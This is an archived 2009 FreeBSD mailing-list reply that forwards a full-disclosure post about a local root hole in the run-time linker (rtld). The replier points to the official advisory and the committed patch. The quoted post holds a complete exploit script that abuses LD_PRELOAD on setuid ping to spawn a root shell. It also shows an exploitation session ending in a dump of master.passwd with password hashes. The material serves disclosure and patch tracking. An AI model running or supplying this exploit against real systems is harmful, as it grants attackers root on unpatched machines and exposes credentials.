Date: Tue, 1 Dec 2009 22:17:03 -0300 From: Daniel Molina Wegener <dmw@coder.cl> To: freebsd-bugs@freebsd.org Cc: jorge@betazeta.com Subject: Re: Fwd: ** FreeBSD local r00t zeroday Message-ID: <200912012217.09082.dmw@coder.cl> In-Reply-To: <g2otzsukrypcwbems6UYAxe124vaj_firegpg@mail.gmail.com> References: <g2otzsukrypcwbems6UYAxe124vaj_firegpg@mail.gmail.com>
next in thread | previous in thread | raw e-mail | index | archive | help
--nextPart3565497.ZkRs5seGOb Content-Type: Text/Plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable On Tuesday 01 December 2009, jorge@betazeta.com wrote: > I confirmed this. Oh... I've seen this today at 09:20, sorry for the late answer, I'm suscribed to the freebsd-hackers and freebsd-current mailing lists ;) =2D-----8<------ On Tue, Dec 01, 2009 at 06:04:05PM +0700, ~Lst wrote: > Hello all, >=20 > What d'you think about this ? > http://seclists.org/fulldisclosure/2009/Nov/371 Are you actually asking for an opinions of a security hole, or are you just trying to bring it to our attention? An official statement was already issued to freebsd-security about 10 hours ago: http://lists.freebsd.org/pipermail/freebsd-security/2009-December/005369.ht= ml The mentioned patch is for src/libexec/rtld-elf/rtld.c (since full paths aren't present in the patch file). Mentioned patch has already been committed to the HEAD (CURRENT), RELENG_7, and RELENG_8 branches approximately 8.75 hours ago, with the note "Advisory coming soon": http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/rtld-elf/rtld.c =2D-----8<------ >=20 > ---------- Forwarded message ---------- > From: Kingcope <kcope2@googlemail.com> > Date: 2009/11/30 > Subject: ** FreeBSD local r00t zeroday > To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com >=20 >=20 > ** FreeBSD local r00t 0day > Discovered & Exploited by Nikolaos Rangos also known as Kingcope. > Nov 2009 "BiG TiME" >=20 > "Go fetch your FreeBSD r00tkitz" // > http://www.youtube.com/watch?v=3DdDnhthI27Fg >=20 > There is an unbelievable simple local r00t bug in recent FreeBSD versions. > I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out. >=20 > The bug resides in the Run-Time Link-Editor (rtld). > Normally rtld does not allow dangerous environment variables like > LD_PRELOAD to be set when executing setugid binaries like "ping" or "su". > With a rather simple technique rtld can be tricked into > accepting LD variables even on setugid binaries. > See the attached exploit for details. >=20 > Example exploiting session > ********************************** > %uname -a;id; > FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 > 15:48:17 UTC 2009 > root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 > uid=3D1001(kcope) gid=3D1001(users) groups=3D1001(users) > %./w00t.sh > FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in > function 'malloc' > env.c:9: warning: incompatible implicit declaration of built-in > function 'strcpy' > env.c:11: warning: incompatible implicit declaration of built-in > function 'execl' > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # uname -a;id; > FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 > 15:48:17 UTC 2009 > root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 > uid=3D1001(kcope) gid=3D1001(users) euid=3D0(root) groups=3D1001(users) > # cat /etc/master.passwd > # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 > kensmith Exp $ > # > root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie > &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: > daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin > operator:*:2:5::0:0:System &:/:/usr/sbin/nologin > bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin > tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin > kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin > games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin > news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin > man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin > sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin > smmsp:*:25:25::0:0:Sendmail Submission > User:/var/spool/clientmqueue:/usr/sbin/nologin > mailnull:*:26:26::0:0:Sendmail Default > User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind > Sandbox:/:/usr/sbin/nologin > proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nolog= in > _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin > _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin > uucp:*:66:66::0:0:UUCP > pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico > pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin > www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin > nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin > kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User > &:/home/kcope:/bin/sh > # >=20 > Systems tested/affected > ********************************** > FreeBSD 8.0-RELEASE *** VULNERABLE > FreeBSD 7.1-RELEASE *** VULNERABLE > FreeBSD 6.3-RELEASE *** NOT VULN > FreeBSD 4.9-RELEASE *** NOT VULN >=20 > *EXPLOIT* >=20 > #!/bin/sh > echo ** FreeBSD local r00t zeroday > echo by Kingcope > echo November 2009 > cat > env.c << _EOF > #include <stdio.h> >=20 > main() { > extern char **environ; > environ =3D (char**)malloc(8096); >=20 > environ[0] =3D (char*)malloc(1024); > environ[1] =3D (char*)malloc(1024); > strcpy(environ[1], > "LD_PRELOAD=3D/tmp/w00t.so.1.0"); >=20 > execl("/sbin/ping", "ping", 0); > } > _EOF > gcc env.c -o env > cat > program.c << _EOF > #include <unistd.h> > #include <stdio.h> > #include <sys/types.h> > #include <stdlib.h> >=20 > void _init() { > extern char **environ; > environ=3DNULL; > system("echo ALEX-ALEX;/bin/sh"); > } > _EOF > gcc -o program.o -c program.c -fPIC > gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles > cp w00t.so.1.0 /tmp/w00t.so.1.0 > ./env >=20 Best regards, =2D-=20 | Daniel Molina Wegener <dmw [at] coder [dot] cl> | | IT Consulting & Software Developer | | http://coder.cl/ | --nextPart3565497.ZkRs5seGOb Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQIcBAABCgAGBQJLFcAPAAoJEHxqfq6Y4O5Ne+wP/0ZFhXa1lMW4hUUihDiRhR+u e22pYyZbZpoiTOOGzqPRLF3tza1OjcYQsm/8MHqjpM+l1VlKQHrT+5XYBT3hHdqL 07U6TEsmI/WsI769Ds/ouvANGwDvZ77QxRQ7N4cOe/cPEhyNIwQKzq88s9nbs+gl 3p1sYHJMKpQzRioBL3IEMd6c/9vsdcJ0/N10f7jcDrULyBnIdXBZ8Gj+e0qWFBT0 Cok+v/OsFH7No8EvO/LBEzBr27AEj/ZH8s6j4VWkgkkEjEkQXY6xTl9y2KQaFHeL BIJNgvnkT+pg6jSFGEP9AP/YOA8jE2aQVmETP6ap50ZtlFwNJz5dtixN0c2JC5vy wCxCA94VrPFwaeCcYtBwl8/XqmRfvI33aCVP9yK7sJi63fIb14hAdqOCSZQcVfB9 ZEKRIEZnkJjayQo0QM/zuL4utWao+mF47CanmghF4j/d1p/kZGPAU01HD6LYBbwy Q00CCtFPJBvoPv3oBtw2bS9iWVKw4d1CRvzK5v0JA/XCqfsESePD0UFoPzvQvycd QtbM6BIDugx5FKbDzmYf2UgaNav5DPz/jlfA0kX16cz04bGVqrWkngQmSo4kZWNT bf/Gi8QLy2F1980Tl/+zgjr6QLMaxI7gbjxW9RHoHJdo/aqtg9cjvDNi7m1W5DAm 0lKuG+PwSm+lP1/dcZ7g =/VE5 -----END PGP SIGNATURE----- --nextPart3565497.ZkRs5seGOb--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200912012217.09082.dmw>